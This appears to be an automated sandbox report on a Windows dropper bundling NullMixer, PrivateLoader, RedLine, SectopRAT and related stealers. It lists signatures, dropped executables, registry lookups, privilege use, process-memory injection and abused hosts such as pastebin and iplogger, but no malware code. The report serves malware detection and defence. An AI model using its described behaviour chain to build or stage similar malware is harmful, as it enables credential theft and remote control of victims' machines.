Malware Analysis Report

2025-01-02 06:00

Sample ID 241123-zrd28ssmck
Target 544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe
SHA256 544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f
Tags
fabookie nullmixer privateloader redline sectoprat chris fucker2 media21 aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan gcleaner onlylogger
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f

Threat Level: Known bad

The file 544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe was found to be: Known bad.

Malicious Activity Summary

fabookie nullmixer privateloader redline sectoprat chris fucker2 media21 aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan gcleaner onlylogger

Privateloader family

Nullmixer family

RedLine payload

RedLine

PrivateLoader

Fabookie

Sectoprat family

OnlyLogger

Fabookie family

GCleaner

Gcleaner family

SectopRAT

NullMixer

Detect Fabookie payload

Onlylogger family

Redline family

SectopRAT payload

OnlyLogger payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

ASPack v2.12-2.42

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-23 20:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-23 20:56

Reported

2024-11-23 20:58

Platform

win7-20241010-en

Max time kernel

119s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22d8c4cdc4a5a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22269ff37e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed224fff3f809a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed227d9e0c1976ea6dc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22293324c9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22988be99e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22168eb266d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2235e1e9c9640.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed220fb9dde4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SSTOM.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PTJ8K.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22add6199f.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22d8c4cdc4a5a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22d8c4cdc4a5a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22269ff37e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22269ff37e.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed224fff3f809a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed224fff3f809a1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22add6199f.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22988be99e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22988be99e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22168eb266d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22168eb266d7a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2235e1e9c9640.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2235e1e9c9640.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed220fb9dde4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed220fb9dde4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SSTOM.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SSTOM.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SSTOM.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SSTOM.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed228eebd341673e072.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed224fff3f809a1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2255741b48dffd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed228eebd341673e072.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22add6199f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed220fb9dde4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2255741b48dffd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22d8c4cdc4a5a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed228eebd341673e072.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2235e1e9c9640.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-PTJ8K.tmp\Wed228eebd341673e072.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22269ff37e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22168eb266d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22add6199f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22ac1480b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-SSTOM.tmp\Wed228eebd341673e072.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22ac1480b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed22988be99e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PTJ8K.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed2235e1e9c9640.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed224fff3f809a1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\Wed227d9e0c1976ea6dc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1084 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2716 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe
PID 2716 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe
PID 2716 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe
PID 2716 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe
PID 2716 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe
PID 2716 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe
PID 2716 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe
PID 1384 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1384 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC9AB2697\setup_install.exe C:\Windows\SysWOW64\cmd.exe
